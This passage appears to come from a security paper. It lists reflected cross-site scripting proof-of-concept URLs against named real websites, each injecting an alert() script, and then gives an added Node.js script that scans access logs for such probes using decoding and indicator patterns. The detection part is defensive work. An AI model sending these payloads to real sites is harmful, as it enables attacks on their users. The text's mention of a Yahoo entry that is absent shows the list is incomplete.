http://www.econ.upf.edu/en/people/onefaculty.php?id=p3759%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://pus.lcs.mit.edu/cgi-bin/scigen.cgi?author=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://mayors24.boston.gov/Ef3/Error.jsp?reason=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://patft.uspto.gov/netacgi/nph-Parser?Sect1=PTO2&Sect2=HITOFF&u=%2Fnetahtml%2FPTO%2Fsearch-adv.htm&r=0&p=1&f=S&l=50&Query=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&d=PTXT
http://www.ourdocuments.gov/content.php?flash=true&page=%22%3E%3Cscript%3Ealert%28/xss/%29;%3C/script%3E
XSS IN MANY SENSITIVE SITES IS NOT LISTED HERE, BUT THOSE FINDINGS CAN BE SEEN AT -->
http://www.facebook.com/media/set/?set=a.224850657641509.49377.100003497297964&type=3&l=8d8755e93a
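The URLs above share a shape that a defender can look for: a query parameter that, once percent-decoded (sometimes twice, as in the Yahoo entry), contains a tag, an event handler or an alert() call. The following is an added example, not from this paper, written for Node.js. It parses access-log lines in the Apache/nginx "combined" format, decodes each query parameter repeatedly to unwrap double encoding, and flags parameters that match a short indicator list. The log lines are constructed for this example, and the hostnames and addresses in them are documentation values, not real targets.

```javascript
// Added example (not from the original paper): spotting reflected-XSS probes
// like the URLs above in a web server access log.

// Constructed sample log in Apache/nginx "combined" format. Two probe lines
// from one address (the second is double-encoded), one benign search, and one
// probe arriving via a referer.
const SAMPLE_LOG = [
  '203.0.113.7 - - [12/Mar/2012:10:15:32 +0000] "GET /search.php?q=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [12/Mar/2012:10:15:40 +0000] "GET /search.php?q=%2522%253E%253Ciframe+onload%253Dalert%2528%252FXSS%252F%2529%253E HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '198.51.100.23 - - [12/Mar/2012:10:16:01 +0000] "GET /search.php?q=cross+site+scripting+paper&page=2 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
  '198.51.100.23 - - [12/Mar/2012:10:16:20 +0000] "GET /index.php?page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 4096 "http://board.example/post/42" "Mozilla/5.0"',
].join('\n');

// ip ident user [time] "method target protocol" status bytes "referer" "agent"
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/;

// Strings that appear in nearly every payload on this page. Order matters only
// for the report; \b on the event-handler check keeps "action=" from matching.
const INDICATORS = [
  { name: 'script tag',          re: /<\s*\/?\s*script/i },
  { name: 'iframe tag',          re: /<\s*iframe/i },
  { name: 'event handler',       re: /\bon\w+\s*=/i },
  { name: 'javascript: url',     re: /javascript\s*:/i },
  { name: 'alert()',             re: /\balert\s*\(/i },
  { name: 'String.fromCharCode', re: /string\.fromcharcode/i },
  { name: 'document.cookie',     re: /document\.cookie/i },
];

// Form-decodes a value, then percent-decodes it again while that still changes
// something (bounded, so a literal '%' in a legitimate value cannot loop).
// A malformed escape stops decoding instead of throwing.
function deepDecode(value, maxRounds = 3) {
  let cur = value.replace(/\+/g, ' ');
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(cur); } catch (e) { break; }
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Splits one log line into fields and its query string into decoded parameters.
function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  const [, ip, time, method, target, status, referer, agent] = m;
  const qIndex = target.indexOf('?');
  const path = qIndex < 0 ? target : target.slice(0, qIndex);
  const params = [];
  if (qIndex >= 0) {
    for (const pair of target.slice(qIndex + 1).split('&')) {
      const eq = pair.indexOf('=');
      const key = eq < 0 ? pair : pair.slice(0, eq);
      const raw = eq < 0 ? '' : pair.slice(eq + 1);
      params.push({ key: deepDecode(key), raw, decoded: deepDecode(raw) });
    }
  }
  return { ip, time, method, path, params, status: Number(status), referer, agent };
}

// Returns one hit per suspicious parameter, with the decoded value and the
// indicators that fired, so an analyst can see the payload as the page saw it.
function scanAccessLog(text) {
  const hits = [];
  for (const line of text.split('\n')) {
    const req = parseLine(line.trim());
    if (!req) continue;
    for (const p of req.params) {
      const indicators = INDICATORS.filter((i) => i.re.test(p.decoded)).map((i) => i.name);
      if (indicators.length) {
        hits.push({ ip: req.ip, time: req.time, path: req.path, param: p.key,
                    decoded: p.decoded, referer: req.referer, indicators });
      }
    }
  }
  return hits;
}

for (const h of scanAccessLog(SAMPLE_LOG)) {
  console.log(`${h.ip} ${h.path}?${h.param}= ${JSON.stringify(h.decoded)} -> ${h.indicators.join(', ')}`);
}
```

This catches probes and scanner traffic of the kind listed above, which is useful for seeing who is testing your site and which parameters they are hitting; it does not catch a payload that avoids the listed strings, so it is a detection aid, not a substitute for output encoding at the reflection point. Decoding runs until the value stops changing so that the double-encoded entries decode to the same text as the plain ones.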